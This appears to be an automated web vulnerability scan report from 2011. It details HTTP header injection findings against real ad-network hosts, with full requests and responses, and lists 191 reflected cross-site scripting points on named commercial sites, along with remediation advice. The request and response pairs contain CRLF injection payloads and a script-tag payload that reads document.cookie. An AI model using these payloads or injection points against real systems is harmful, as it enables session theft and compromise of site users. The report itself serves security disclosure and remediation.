XSS, Cross Site Scripting, CWE-113, CWE-79, CAPEC-86, Vulnerability PoC Examples

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Hp/Retarget_Homepage_Nonsecure@Bottom3 [REST URL parameter 5] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_nx.ads/TRACK_Hp/Retarget_Homepage_Nonsecure@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the Set-Cookie response header. The payload dbd29%0d%0a57ddbfb6291 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream_nx.ads/TRACK_Hp/dbd29%0d%0a57ddbfb6291 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.shopping.hp.com/webapp/shopping/cto.do?destination=components&eppPrefix=&productId=XX096AV%23ABA&parentCompId=&doBvPricing=true&doBvPageData=true&doBvParamData=true&reconfig=false&category=desktops%2FHPE590t_series&can_params=%26a1%3DCategory%26v1%3DHigh+performance5249e'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1254459d51bedd78b&v1=High+performance
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; S247=3SHMdODZXwiULLqkivponR9TFGKNXO3633WY_nuhPf0QQPdf7d3Vdqg; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; BCN2010110741=2; RMFD=011Q1HsmO2016kC|O1016oi|O1016oj|O1016vE|O1016x1|O1016xy|O1016yW|O10170Y|O20171t|O10172C|O20179T|O10179n; RMFL=011Q1hMrU10KeT|U10M2X|U1014YV; NXCLICK2=011Q1hMsNX_TRACK_Hp/Retarget_Homepage_Nonsecure!y!B3!M2X!puyONX_TRACK_Hp/f596c%0d%0ad1ae81f7faf!yaKh+NX_TRACK_Hpdirect/Retargeting_Homepage_Nonsecure!y!B3!14YV!1MO3W

Response

HTTP/1.1 302 Found
Date: Mon, 21 Mar 2011 15:54:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: NXCLICK2=011Q1hQmNX_TRACK_Hp/dbd29
57ddbfb6291!y$eh+NX_TRACK_Hpdirect/Retargeting_Homepage_Nonsecure!y!B3!14YV!1MO3W; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
Location: http://imagen01.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif
Content-Length: 345
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Mon, 21-Mar-2011 07:44:45 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://imagen01.247realmedia.com/RealMedia/ads/
...[SNIP]...

1.2. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Hpdirect/Retargeting_Homepage_Nonsecure@Bottom3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_nx.ads/TRACK_Hpdirect/Retargeting_Homepage_Nonsecure@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the Set-Cookie response header. The payload 4de21%0d%0afeccff905e6 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream_nx.ads/TRACK_Hpdirect/4de21%0d%0afeccff905e6 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2305757;type=hhore983;cat=hhono555;ord=1;num=1326950455550.1045?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801i4doAAvyI; S247=3SHMdODZXwiULLqkivponR9TFGKNXO3633WY_nuhPf0QQPdf7d3Vdqg; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; BCN2010110741=2; RMFD=011Q1HsmO2016kC|O1016oi|O1016oj|O1016vE|O1016x1|O1016xy|O1016yW|O10170Y|O20171t|O10172C|O20179T|O10179n; RMFL=011Q1hMrU10KeT|U10M2X; NXCLICK2=011Q1hMrNX_TRACK_Hp/Retarget_Homepage_Nonsecure!y!B3!M2X!puyO

Response

HTTP/1.1 302 Found
Date: Mon, 21 Mar 2011 15:50:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: NXCLICK2=011Q1hMsNX_TRACK_Hp/Retarget_Homepage_Nonsecure!y!B3!M2X!puyONX_TRACK_Hpdirect/4de21
feccff905e6!yd..*NX_TRACK_Hpdirect/Retargeting_Homepage_Nonsecure!yd..*; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
Location: http://imagen01.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif
Content-Length: 345
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Mon, 21-Mar-2011 07:40:43 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://imagen01.247realmedia.com/RealMedia/ads/
...[SNIP]...

1.3. http://tacoda.at.atwola.com/rtx/r.js [si parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 2b8d1%0d%0a01d57f54f74 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=AJS&si=2b8d1%0d%0a01d57f54f74&pi=L&xs=1&pu=http%253A//www.highbeam.com/%253Fifu%253D&df=1&v=5.5&cb=83829 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=60174^1^1300913115|50212^1^1300973841|61225^1^1301330452; Tsid=0^1300725652^1300727452|12146^1300725652^1300727452; TData=99999|^|61674|60493|60489|60490|60740|60500|50963|61576|50455|60491|60515|60514|56830|53656|56918|56262|51184|56920|51133|52615|54173|50399|56917|60197|54463|53435|56969|56718|56555|52576|50212|50213|56715|56780|60174; N=2:20b46dbd8b9d958d9b91502154abef0e,73be88250e5d4a2e666bec75a24261ac; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0OTM6NjA0ODk6NjA0OTA6NjA3NDA6NjA1MDA6NTA5NjM6NjE1NzY6NTA0NTU6NjA0OTE6NjA1MTU6NjA1MTQ6NTY4MzA6NTM2NTY6NTY5MTg6NTYyNjI6NTExODQ6NTY5MjA6NTExMzM6NTI2MTU6NTQxNzM6NTAzOTk6NTY5MTc6NjAxOTc6NTQ0NjM6NTM0MzU6NTY5Njk6NTY3MTg6NTY1NTU6NTI1NzY=; eadx=1

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:47:59 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 21 Mar 2011 17:02:59 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Thu, 15-Mar-12 16:47:59 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60174^1^1300913115|50212^1^1300973841|61225^1^1301330879; path=/; expires=Mon, 28-Mar-11 16:47:59 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1300725652^1300727879|12146^1300725652^1300727452|2b8d1
01d57f54f74^1300726079^1300727879; path=/; expires=Mon, 21-Mar-11 17:17:59 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|50455|60514|53656|56830|52615|60546|56918|60500|56920|56930|56555|56500|50399|61225|52611|53603|51133|53435|51184|54173|56718|54463|50212|56715|56780; expires=Thu, 15-Mar-12 16:47:59 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:73be88250e5d4a2e666bec75a24261ac,5ae38f738c1cc45c0e29668b172ae1c1; expires=Thu, 15-Mar-12 16:47:59 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NTA0NTU6NjA1MTQ6NTM2NTY6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY5MzA6NTY1NTU6NTY1MDA6NTAzOTk6NjEyMjU6NTI2MTE6NTM2MDM6NTExMzM6NTM0MzU6NTExODQ6NTQxNzM=; expires=Thu, 15-Mar-12 16:47:59 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=2; path=/; expires=Tue, 20-Mar-12 16:47:59 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|50455|60514|53656|56830|52615|60546|56918|60500|56920|
...[SNIP]...

2. Cross-site scripting (reflected) previous
There are 191 instances of this issue:

http://a.collective-media.net/ad/cm.womensforum/ [REST URL parameter 1]
http://a.collective-media.net/adj/cm.womensforum/ [REST URL parameter 2]
http://a.collective-media.net/adj/cm.womensforum/ [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/cm.womensforum/ [sz parameter]
http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_adid parameter]
http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_id parameter]
http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [mt_uuid parameter]
http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [redirect parameter]
http://ad.doubleclick.net/adj/N553.mediamath/B5123370.14 [sz parameter]
http://ds.addthis.com/red/psi/sites/www.icfi.com/p.json [callback parameter]
http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$bg parameter]
http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$dt parameter]
http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$fti parameter]
http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$mon parameter]
http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [REST URL parameter 5]
http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/scp_dt [$scp_fmt$&$pb parameter]
http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/scp_dt [$sid parameter]
http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/scp_dt [REST URL parameter 5]
http://ib.adnxs.com/ptj [redir parameter]
https://icfi.taleo.net/careersection/careersection/privacyagreement/statementBeforeAuthentification.jsf [cshtstate parameter]
https://icfi.taleo.net/careersection/careersection/privacyagreement/statementBeforeAuthentification.jsf [ftlstate parameter]
https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [cshtstate parameter]
https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [focusOnField parameter]
https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlISWLDMessage parameter]
https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlajaxid parameter]
https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlcallback parameter]
https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [ftlcompid parameter]
https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [initialHistory parameter]
https://icfi.taleo.net/careersection/icf_prof_ext/jobsearch.ajax [jobCartIcon parameter]
https://icfi.taleo.net/careersection/icf_prof_ext/moresearch.ftl [jobCartIcon parameter]
https://icfi.taleo.net/careersection/icf_prof_ext/myjobs.ftl [cshtstate parameter]
https://icfi.taleo.net/careersection/icf_prof_ext/myjobs.ftl [ftlstate parameter]
http://k.collective-media.net/cmadj/cm.womensforum/ [REST URL parameter 2]
https://login.quickbooks.com/j/qbn/auth/employee [REST URL parameter 3]
http://mbox.offermatica.intuit.com/m2/intuit/mbox/standard [mbox parameter]
http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]
http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]
http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [bas parameter]
http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]
http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]
http://quickbooks.intuit.com/ [name of an arbitrarily supplied request parameter]
http://quickbooks.intuit.com/point-of-sale-system/ [name of an arbitrarily supplied request parameter]
http://quickbooks.intuit.com/pro/ [name of an arbitrarily supplied request parameter]
http://quickbooks.intuit.com/product/add-ons/checks-forms-and-supplies/computer-payroll-sofware.jsp [name of an arbitrarily supplied request parameter]
http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [name of an arbitrarily supplied request parameter]
http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [name of an arbitrarily supplied request parameter]
http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [sc parameter]
http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [sc parameter]
http://quickbooksonline.intuit.com/bookkeeping-accounting-systems/ [sc parameter]
http://s7d2.scene7.com/is/image/HPShopping/xx096av_01_10 [REST URL parameter 4]
http://s7d2.scene7.com/is/image/HPShopping/xx096av_03_10 [REST URL parameter 4]
http://s7d2.scene7.com/is/image/HPShopping/xx096av_05_30 [REST URL parameter 4]
http://s7d2.scene7.com/is/image/HPShopping/xx096av_06_10 [REST URL parameter 4]
http://tag.admeld.com/ad/json/100/glamtoptier/300x250/1621082087 [callback parameter]
http://tag.admeld.com/ad/json/100/glamtoptier/300x250/1621082087 [container parameter]
http://www.highbeam.com/ControlLoader.aspx [ControlName parameter]
http://www.highbeam.com/iframead/display.aspx [id parameter]
http://www.highbeam.com/iframead/display.aspx [kvps parameter]
http://www.highbeam.com/iframead/display.aspx [zone parameter]
http://www.shopping.hp.com/webapp/shopping/computer_can_series.do [jumpid parameter]
http://www.shopping.hp.com/webapp/shopping/cto.do [can_params parameter]
http://www.shopping.hp.com/webapp/shopping/cto.do [eppPrefix parameter]
http://www.shopping.hp.com/webapp/shopping/cto.do [eppPrefix parameter]
http://www.shopping.hp.com/webapp/shopping/cto.do [eppPrefix parameter]
http://www.shopping.hp.com/webapp/shopping/series_can.do [jumpid parameter]
http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]
http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]
http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter]
http://payments.intuit.com/ [Referer HTTP header]
http://payments.intuit.com/ [Referer HTTP header]
http://payments.intuit.com/ [Referer HTTP header]
http://payments.intuit.com/apply-now/ [Referer HTTP header]
http://payments.intuit.com/apply-now/ [Referer HTTP header]
http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]
http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]
http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]
http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]
http://payments.intuit.com/products/ [Referer HTTP header]
http://payments.intuit.com/products/ [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header]
http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header]
http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header]
http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header]
http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header]
http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header]
http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/echecks-and-check-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]
http://payments.intuit.com/products/internet-merchant-accounts.jsp [Referer HTTP header]
http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/online-credit-card-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header]
http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [Referer HTTP header]
http://payments.intuit.com/support/ [Referer HTTP header]
http://payments.intuit.com/support/ [Referer HTTP header]
http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]
http://payments.intuit.com/support/glossary.jsp [Referer HTTP header]
http://www.highbeam.com/doc/1P2-675451.html [Referer HTTP header]
http://k.collective-media.net/cmadj/cm.womensforum/ [cli cookie]
http://payments.intuit.com/ [abTestGroup cookie]
http://payments.intuit.com/ [abTestGroup cookie]
http://payments.intuit.com/apply-now/ [abTestGroup cookie]
http://payments.intuit.com/apply-now/ [abTestGroup cookie]
http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]
http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]
http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]
http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]
http://payments.intuit.com/products/ [abTestGroup cookie]
http://payments.intuit.com/products/ [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie]
http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [abTestGroup cookie]
http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie]
http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [abTestGroup cookie]
http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie]
http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [abTestGroup cookie]
http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/echecks-and-check-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]
http://payments.intuit.com/products/internet-merchant-accounts.jsp [abTestGroup cookie]
http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/online-credit-card-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/ [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/online-credit-card-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/point-of-sale-solutions.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/quickbooks-online-billing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/products/quickbooks-payment-solutions/web-credit-card-processing.jsp [abTestGroup cookie]
http://payments.intuit.com/support/ [abTestGroup cookie]
http://payments.intuit.com/support/ [abTestGroup cookie]
http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]
http://payments.intuit.com/support/glossary.jsp [abTestGroup cookie]
http://tag.admeld.com/ad/json/100/glamtoptier/300x250/1621082087 [meld_sess cookie]
http://www2.glam.com/app/site/affiliate/viewChannelModule.act [ctags cookie]
http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]
http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://a.collective-media.net/ad/cm.womensforum/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/ad/cm.womensforum/

Issue detail

